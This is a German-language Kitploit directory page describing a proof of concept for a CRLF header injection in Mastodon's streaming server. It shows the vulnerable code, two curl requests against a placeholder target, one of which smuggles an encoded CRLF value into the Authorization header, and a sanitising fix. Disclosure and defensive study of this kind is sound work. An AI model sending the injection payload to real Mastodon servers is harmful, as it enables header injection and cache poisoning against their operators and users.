Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-Mastodon-Streaming-CRLF-Injection — Mastodon Streaming Server Security Vulnerability PoC - CVE-2026-Mastodon-Streaming-CRLF-Injection | Kitploit
Tools/GitHubGitHub/1402307692/cve-2026-mastodon-streaming-crlf-injection
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHub1402307692/cve-2026-mastodon-streaming-crlf-injection

CVE-2026-Mastodon-Streaming-CRLF-Injection

Mastodon Streaming Server Security Vulnerability PoC - CVE-2026-Mastodon-Streaming-CRLF-Injection

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
vor 4 MonatenNoch nicht geprüft

CVE-2026-XXXXX: HTTP-Response-Header-Injection (CRLF) im Mastodon Streaming Server

Schwachstellenübersicht

ElementDetails
CVE-IDCVE-2026-XXXXX
Betroffenes ProduktMastodon (Streaming Server)
Betroffene Version<= 4.5.9
Komponentestreaming/index.js, Zeilen 188-206
SchwachstellentypHTTP-Response-Header-Injection / CRLF-Injection
CWECWE-74
CVSS 3.16.5 (Mittel)
AngriffsvektorNetzwerk
Melderqitian [email protected]

Schwachstellenbeschreibung

Wenn eine WebSocket-Upgrade-Anfrage die Authentifizierung nicht besteht, erstellt der Mastodon Streaming Server in streaming/index.js, Zeilen 188-206, eine manuelle HTTP-Antwort und schreibt errorMessage direkt über socket.end() in den X-Error-Message-Antwortheader – OHNE die Zeichen \r oder \n zu bereinigen.

Dadurch kann ein nicht authentifizierter Remote-Angreifer beliebige HTTP-Header injizieren oder HTTP Response Splitting durchführen.

Verwundbarer Code (streaming/index.js, Zeilen 188-206)

root@kitploit:~
const { statusCode, errorMessage } = extractErrorStatusAndMessage(err);
const headers = {
  'Connection': 'close',
  'Content-Type': 'text/plain',
  'Content-Length': 0,
  'X-Request-Id': request.id,
  'X-Error-Message': errorMessage   // NO CRLF sanitization
};
socket.end(
  `HTTP/1.1 ${statusCode} ${http.STATUS_CODES[statusCode]}\r\n` +
  `${Object.keys(headers).map((key) => `${key}: ${headers[key]}`).join('\r\n')}\r\n\r\n`
);

Auswirkungen

  • HTTP-Header-Injection: Injizieren beliebiger HTTP-Header
  • HTTP Response Splitting: Injizieren eines zweiten HTTP-Antwortbodys (Cache-Poisoning)
  • Informationsoffenlegung: Interne Fehlermeldungen werden nicht authentifizierten Benutzern offengelegt

Proof of Concept

PoC 1 - Grundlegende Erkennung

root@kitploit:~
curl -i -X GET \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  http://TARGET:4000/api/v1/streaming/user

Erwartet: HTTP/1.1 401 Unauthorized, X-Error-Message: Missing access token

PoC 2 - CRLF-Injection

root@kitploit:~
curl -i -X GET \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  -H "Authorization: Bearer test%0d%0aX-Injected: evil" \
  http://TARGET:4000/api/v1/streaming/user

Behebung

Bereinigen Sie errorMessage, bevor Sie sie in den Socket-Header schreiben:

root@kitploit:~
const sanitizedMessage = String(errorMessage || '')
  .replace(/\r/g, '%0D')
  .replace(/\n/g, '%0A');
// OR use Node.js res.setHeader() API which prevents header injection

Zeitleiste

DatumEreignis
2026-04-22Schwachstelle entdeckt und PoC erstellt
2026-04-22CVE-Bericht an MITRE / VDB eingereicht

Referenzen

  • https://github.com/mastodon/mastodon
  • https://cwe.mitre.org/data/definitions/74.html

Haftungsausschluss: Dieses PoC dient ausschließlich Bildungs- und Sicherheitsforschungszwecken.

Tool herunterladen